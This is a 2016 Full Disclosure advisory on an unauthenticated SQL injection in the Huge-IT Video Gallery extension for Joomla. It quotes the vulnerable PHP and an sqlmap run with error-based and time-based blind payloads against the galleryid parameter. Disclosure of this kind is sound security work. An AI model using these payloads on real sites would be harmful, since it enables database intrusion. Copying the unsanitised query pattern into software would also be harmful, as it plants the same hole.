Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-15
Download Site: http://huge-it.com/joomla-video-gallery/
Vendor: www.huge-it.com, fixed v1.1.0
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com
Description: A video slideshow gallery.
The following code does not prevent an unauthenticated user from injecting SQL 
into functions located in ajax_url.php. 

Vulnerable Code in : ajax_url.php

 11 define('_JEXEC',1);
 12 defined('_JEXEC') or die('Restircted access');
 28         if($_POST['task']=="load_videos_content"){
 30             $page = 1;
 33             if(!empty($_POST["page"]) && is_numeric($_POST['page']) && 
 34                 $paramssld='';
 35                 $db5 = JFactory::getDBO();
 36                 $query5 = $db->getQuery(true);
 37                 $query5->select('*');
 38                 $query5->from('#__huge_it_videogallery_params');
 39                 $db->setQuery($query5);
 40                 $options_params = $db5->loadObjectList();
 41                 foreach ($options_params as $rowpar) {
 42                     $key = $rowpar->name;
 43                     $value = $rowpar->value;
 44                     $paramssld[$key] = $value;
 45                 }
 46                 $page = $_POST["page"];
 47                 $num=$_POST['perpage'];
 48                 $start = $page * $num - $num;
 49                 $idofgallery=$_POST['galleryid'];
 51                 $query = $db->getQuery(true);
 52                 $query->select('*');
 53                 $query->from('#__huge_it_videogallery_videos');
 54                 $query->where('videogallery_id ='.$idofgallery);
 55                 $query ->order('#__huge_it_videogallery_videos.ordering 
 56                 $db->setQuery($query,$start,$num);

JSON: Export
Exploit Code:
        • $ sqlmap -u 
--level=5 --risk=3
        • .
        • .
        • .
        • (custom) POST parameter '#1*' is vulnerable. Do you want to keep 
testing the others (if any)? [y/N] 
        • sqlmap identified the following injection point(s) with a total of 
2870 HTTP(s) requests:
        • ---
        • Parameter: #1* ((custom) POST)
        •     Type: error-based
        •     Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
        •     Payload: page=1&galleryid=-3390 OR 1 GROUP BY 
CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 
END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING 
        •     Type: AND/OR time-based blind
        •     Title: MySQL >= 5.0.12 time-based blind - Parameter replace
        •     Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) 
ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
        • ---
        • [19:36:55] [INFO] the back-end DBMS is MySQL
        • web server operating system: Linux Debian 8.0 (jessie)
        • web application technology: Apache 2.4.10
        • back-end DBMS: MySQL >= 5.0.12
        • [19:36:55] [WARNING] HTTP error codes detected during run:
        • 500 (Internal Server Error) - 2714 times
        • [19:36:55] [INFO] fetched data logged to text files under 
        • [*] shutting down at 19:36:55
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=169

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

Reply via email to